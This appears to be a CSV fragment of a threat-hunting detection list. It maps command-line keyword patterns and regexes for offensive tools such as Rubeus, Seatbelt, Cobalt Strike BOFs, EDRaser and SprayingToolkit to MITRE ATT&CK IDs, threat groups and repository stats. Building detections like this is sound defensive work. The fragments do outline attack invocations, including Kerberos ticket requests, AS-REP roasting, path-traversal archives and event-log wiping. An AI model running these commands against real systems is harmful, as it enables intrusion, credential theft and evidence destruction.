"* --archive-type zip --symlinks ""../etc/hosts*linkname"" archive  *",".{0,1000}\s\-\-archive\-type\szip\s\-\-symlinks\s\""\.\.\/etc\/hosts.{0,1000}linkname\""\sarchive\s\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","#linux","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","273"
"* --Args AntiVirus --XorKey*",".{0,1000}\s\-\-Args\sAntiVirus\s\-\-XorKey.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","274"
"* --args whoami*",".{0,1000}\s\-\-args\swhoami.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","275"
"* args_spoofing-rs.exe*",".{0,1000}\sargs_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","276"
"* arp.x64.o",".{0,1000}\sarp\.x64\.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","277"
"* arsenal-master.zip*",".{0,1000}\sarsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","278"
"* Ask4Creds.ps1*",".{0,1000}\sAsk4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","279"
"* Ask4Creds.ps1*",".{0,1000}\sAsk4Creds\.ps1.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","0","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","280"
"* asktgs * /ticket:*",".{0,1000}\sasktgs\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","281"
"* asktgs *.kirbi*",".{0,1000}\sasktgs\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","282"
"* asktgs /ticket:*",".{0,1000}\sasktgs\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","283"
"* asktgt * /service:*",".{0,1000}\sasktgt\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","284"
"* asktgt /user *",".{0,1000}\sasktgt\s\/user\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","285"
"* asktgt /user:{0} /certificate:{1} /password:""{2}"" *",".{0,1000}\sasktgt\s\/user\:\{0\}\s\/certificate\:\{1\}\s\/password\:\""\{2\}\""\s.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","286"
"* asktgt /user:{0} /certificate:{1} /password:""{2}"" *",".{0,1000}\sasktgt\s\/user\:\{0\}\s\/certificate\:\{1\}\s\/password\:\""\{2\}\""\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","287"
"* asktht /user:*",".{0,1000}\sasktht\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","288"
"* asm.py -t * -ln -w resources/*.txt -o *",".{0,1000}\sasm\.py\s\-t\s.{0,1000}\s\-ln\s\-w\sresources\/.{0,1000}\.txt\s\-o\s.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","289"
"* asn-query.nse*",".{0,1000}\sasn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","290"
"* --asrep --domain * --user * --pass *",".{0,1000}\s\-\-asrep\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","291"
"* asreproast *",".{0,1000}\sasreproast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","292"
"* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","293"
"* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","294"
"* --asreproast*",".{0,1000}\s\-\-asreproast.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","295"
"* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","296"
"* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","297"
"* --assemblyargs AntiVirus*",".{0,1000}\s\-\-assemblyargs\sAntiVirus.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","298"
"* --assemblyargs AppLocker*",".{0,1000}\s\-\-assemblyargs\sAppLocker.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","299"
"* --asstrongasfuck-opts *",".{0,1000}\s\-\-asstrongasfuck\-opts\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","300"
"* --asstrongasfuck-path *",".{0,1000}\s\-\-asstrongasfuck\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","301"
"* atexec-pro.py*",".{0,1000}\satexec\-pro\.py.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","302"
"* Athena.Commands*",".{0,1000}\sAthena\.Commands.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","303"
"* Athena.Models.*",".{0,1000}\sAthena\.Models\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","304"
"* athena.mythic*",".{0,1000}\sathena\.mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","305"
"* atomizer.py *",".{0,1000}\satomizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","9","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","306"
"* --atompepacker-args *",".{0,1000}\s\-\-atompepacker\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","307"
"* --attack bruteforce*",".{0,1000}\s\-\-attack\sbruteforce.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","308"
"* --attack injection*",".{0,1000}\s\-\-attack\sinjection.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","309"
"* --attack partial_d --key *",".{0,1000}\s\-\-attack\spartial_d\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","310"
"* --attack partial_q --key *",".{0,1000}\s\-\-attack\spartial_q\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","311"
"* -attack remote_db -db_type * -db_username * -db_password *",".{0,1000}\s\-attack\sremote_db\s\-db_type\s.{0,1000}\s\-db_username\s.{0,1000}\s\-db_password\s.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","312"
"* --attack vulns *",".{0,1000}\s\-\-attack\svulns\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","313"
"* -attack windows_application_event_log_local*",".{0,1000}\s\-attack\swindows_application_event_log_local.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","314"
"* -attack windows_event_log*",".{0,1000}\s\-attack\swindows_event_log.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","315"
"* -attack windows_security_event_log_remote*",".{0,1000}\s\-attack\swindows_security_event_log_remote.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","316"
"* --attacker-host *",".{0,1000}\s\-\-attacker\-host\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 -  T1101 -  T1201 -  T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","317"
"* --attacker-port *",".{0,1000}\s\-\-attacker\-port\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 -  T1101 -  T1201 -  T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","318"
"* -attak syslog*",".{0,1000}\s\-attak\ssyslog.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","319"
